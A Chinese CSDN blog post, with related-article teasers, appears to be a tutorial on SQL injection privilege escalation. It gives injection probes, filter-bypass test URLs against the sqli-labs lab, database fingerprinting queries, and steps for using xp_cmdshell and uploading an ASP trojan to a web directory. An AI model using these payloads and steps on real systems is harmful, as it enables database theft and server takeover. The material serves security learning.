SQL注入之权限提升

最新推荐文章于 2024-05-13 12:11:55 发布
最新推荐文章于 2024-05-13 12:11:55 发布
阅读量5.5k 收藏 3
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuhuaijin/article/details/77170567
版权

1.发现SQL注入位置

1)整型参数的判断

永假条件:?p=1 and 1=2

永真条件:?p=1 and 1=1

空条件:?p=1 or 1=1

2)字符型参数的判断

永假条件:?p=1' and '1'='2

永真条件:?p=1' and '1'='1

空条件:?p=1' or '1'='1

3)过滤特殊字符的判断

确认过滤了#    
http://localhost/sqli-labs/Less-26/?id=%231    
确认过滤了or    
http://localhost/sqli-labs/Less-26/?id=or1    
确认过滤多行注释符    
http://localhost/sqli-labs/Less-26/?id=/*1    
确认过滤了单行注释    
http://localhost/sqli-labs/Less-26/?id=--1   
确认过滤了斜杠    
http://localhost/sqli-labs/Less-26/?id=/1    
确认过滤了反斜杠    
http://localhost/sqli-labs/Less-26/?id=1\    
确认过滤了空格    
http://localhost/sqli-labs/Less-26/?id=1' ' '    

ascii编码:把输入 的字符用ascii码代替,如U=char(85)

2.判断后台数据库类型

MSSQL备忘单:

select @@version;  查看版本

select db_name(); 获取当前数据库

select user; 获取当前用户

select grantee,table_name,privilege_type from information_schema.table_privileges; 查看当前用户权限

MySQL备忘单:

select @@version; 查看版本

select database(); 查看当前数据库

select user(); 查看当前用户

select * from information_schema.user_privileges where grantee='xxxx'; 查看当前用户权限

select grantee,privilege_type,is_grantable from information_schema.user_privileges; 当前用户权限

Oracle备忘单:

select banner from v$version; 查看版本

select sys_context('userenv', 'db_name') from dual; 查看当前数据库

select user from dual; 查看当前用户

select privilege from session_privs; 查看当前用户的权限

2)利用系统表

access的系统表是msysobjects,在web环境下没有访问权限

SQL server的系统表是sysobjects,在web环境下有访问权限

MSSQL三个关键系统表:sysdatabases,sysobjects,syscolumns

3.确定xp_cmdshell可执行

4.发现web虚拟目录

1)根据经验猜解:

web虚拟目录:c:\inetpub\wwwroot;D:\inetpub\wwwroot;等

可执行虚拟目录:c:\inetpub\scripts; D:\inetpub\scripts;等

5.上传asp木马(一段有特殊功能的asp代码,放入web虚拟目录的scripts下,远程客户端可执行它,进而得到系统的user权限)

6.得到管理员权限(asp木马只有user权限,要想获取对系统的完全控制,还有有系统的管理员权限)


玄瞋
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mssql 注入攻击,普通权限用户提权操作
瞎几把学
03-01 4973
如果该用户能够创建数据库的话use mastergocreate database bookgouse bookgoalter database book set RECOVERY FULLgocreate table cmd (a image)gobackup database book to disk='c:bookdb.bak' with initgobackup log book to disk='c:/book.bak' with initgoinsert into cmd (a) values(
SQL注入-基于MySQL的注入提权(十七)
Gjqhs的博客
02-22 3237
实验目的 普及结合dll文件对Windows系统进行UDF提权,掌握UDF提权的基本思路,熟悉UDF提权的主要方法。PS:面试时不要说打靶场什么东西,就说创建用户,文件执行什么之类的 基本概念 提权 通过某种方式将权限用户提升为高权限用户的过程。 注入提权 一般指的是在掌控了某数据库账户的情况下,通过SQL注入等方式提升该账户的权 限,进而夺得服务器(操作系统)的控制权 Windows2003操作系统—一默认用户 System:本地机器上拥有最高权限的用户,普通用户管理工具查看不到 Adminis
系列2:5、sql注入之高权限注入
qq_44704184的博客
03-25 3785
sql注入之高权限注入 在数据库中区分有数据库系统用户与数据库**普通用户,**二者的划分主要体现在对一些高级函数与资源表的访问权限上。直白一些就是高权限系统用户拥有整个数据库的操作权限,而普通用户只拥有部分已配置的权限。 网站在创建的时候会调用数据库链接,会区分系统用户链接与普通用户链接;当多个网站存在一个数据库的时候.root就拥有最高权限可以对多个网站进行管辖,普通用户仅拥有当前网站和配置的部分权限。所以当我们获取到普通用户权限时,我们只拥有单个数据库权限,甚至文件读写失败;取得高权限用户权限,不仅可
【网络安全-SQL注入(4)】一篇文章带你了解sql server数据库三大权限,以及三大权限SQL注入SQL注入点利用以及getshell_sqlsever数据库报错注入
最新发布
2401_84970893的博客
05-13 1032
#查询所有数据库名,除了master,iNethinkCMS。
13.SQL漏洞-高权限注入&敏感文件读写
mingyqf的博客
03-20 4141
思维导图 【高权限注入及权限注入】 高用户权限用户权限的不同 网站A=数据库A=管理员用户A 存在sql注入漏洞 Root 前提是具有高权限 网站B=数据库B=管理员用户B 没有存在sql注入漏洞 网站C=数据库C=管理员用户C 跨库查询思路 用高权限用户来跨数据库查询 1.获取所有数据库名 http://192.168.80.140/sqlilabs/Less-2/?id=1 and 1=2 union select 1,group_concat(schema_name),3 from
Sql注入_mysql权限入侵
weixin_30342827的博客
03-22 520
实验:测试不同数据库用户的操作权限 文件读写测试:load_file() ,into outfile 数据库用户账号密码存储在mysql.user下 Mysql最高权限用户root: Mysql普通权限用户test: 无权限文件读写 注入点数据库用户权限由什么决定? 连接数据库用户决定 Mysql注入点进行文件读写操作: 条件:root权限注入...
sql注入之mysql权限问题
不想当脚本小子的脚本小子
02-13 411
有道云笔记链接:http://note.youdao.com/noteshare?id=0e4d59cda87bd2e8d2a864b1aa0e3210&sub=A8D1F4C0629B4A5ABAF405920ADD10E4
sql注入网站源码
04-09
SQL注入是一种常见的网络...通过分析和实践这个"sql注入asp网站"源码,你可以深入理解SQL注入的工作机制,学习如何修复这些漏洞,从而提升你的Web应用程序的安全性。记住,安全是持续的过程,需要不断学习和更新知识。
sql注入靶场.zip
06-24
同时,你也会了解到防止SQL注入的最佳实践,如参数化查询、输入验证、使用预编译的SQL语句、限制数据库用户的权限等。 靶场中的每个挑战都会提供一个目标页面和可能的注入点,你需要通过日志分析、HTTP请求篡改或者...
傀儡SQL批量扫描注入工具
07-14
在网络安全领域,SQL注入是一种常见的攻击手段,它利用网站应用程序对用户输入的数据处理不当,恶意篡改SQL查询语句,获取、修改、删除数据库中的敏感信息。为了防御这种攻击,以及进行安全测试,开发者和安全研究...
SQL注入漏洞演示源代码
09-29
这可能导致数据泄露、用户权限提升甚至整个数据库的完全控制。 源代码中可能包含以下内容: 1. **恶意输入示例**:展示攻击者如何构造输入字符串,比如在用户名或密码字段中插入SQL命令,以绕过身份验证或获取额外...
Mysql漏洞利用(越权,实战怎么从权限拿到root密码)
07-30
Mysql漏洞利用(越权,实战怎么从权限拿到root密码)
sql注入攻击之sqlmap
06-10
SQLMap的工作原理基于探测、枚举、数据提取和权限提升等步骤。首先,它会尝试探测目标站点是否存在SQL注入漏洞,这通常通过发送带有特殊字符的HTTP请求来完成。如果服务器返回异常的结果,可能就表明存在SQL注入的...
sql注入与sqlmap全详细
qq_41620273的博客
12-25 3453
sql注入与sqlmap SQL注入危害: SQL注入分类: 1.基于注入点分类:get注入、post注入、cookie注入 2.基于变量数据类型: 字符型、数字型注入 3.基于获取数据类型方法: 基于回显(查询结果直接显现)、基于错误(由于配置的原因,包错日志原本因该打印到日志文件夹中,却直接输出到了网页页面上来了)、盲注(布尔盲注、时间盲注) 数字型: 布尔盲注: 在id=1后拼接 and 1=1或者 and 1=2; 判断是true或者false 时间盲注:在id=1后拼接
【小迪安全day13】WEB漏洞——SQL注入之MYSQL注入
RichUee的博客
12-05 1323
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
巅峰测试
08-03 1123
在一个供求信息发布的网站上测试了一下,页面http://www.xxx.com/new/new.asp?id=49我做了如下测试:(1) http://www.xxx.com/new/new.asp?id=49’Microsoft OLE DB Provider for ODBC Drivers 错误 80040e14[Microsoft][ODBC Microsoft Access Dri
Sql注入轻松获得管理员权限
weixin_34396902的博客
09-04 1178
检测可否注入 http://127.0.0.1/xx?id=11 and 1=1 (正常页面) http://127.0.0.1/xx?id=11 and 1=2 (出错页面) 检测表段的 http://127.0.0.1/xx?id=11 and exists (select * from admin) 检测字段的 http://127....
PHP+MySQL注入
Jim的博客
08-15 536
一.访问文件系统 1.读文件 MySQL允许使用load data infile和load_file命令将文本文件读到数据库中。 首先创建一个文本文件users.txt 创建数据表:create table authors (fname char(20), sname char(20), email char(100), flag int); 导入数据库:load data infile
sql注入获得root权限
08-04
因此,无法通过SQL注入提升操作系统权限。 引用[3]提到了一种特殊情况,即通过UDF(用户定义函数)提权的方法,可以在某些情况下执行系统命令。但这并不意味着一定可以达到提升到root权限的效果。UDF提权是一种...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值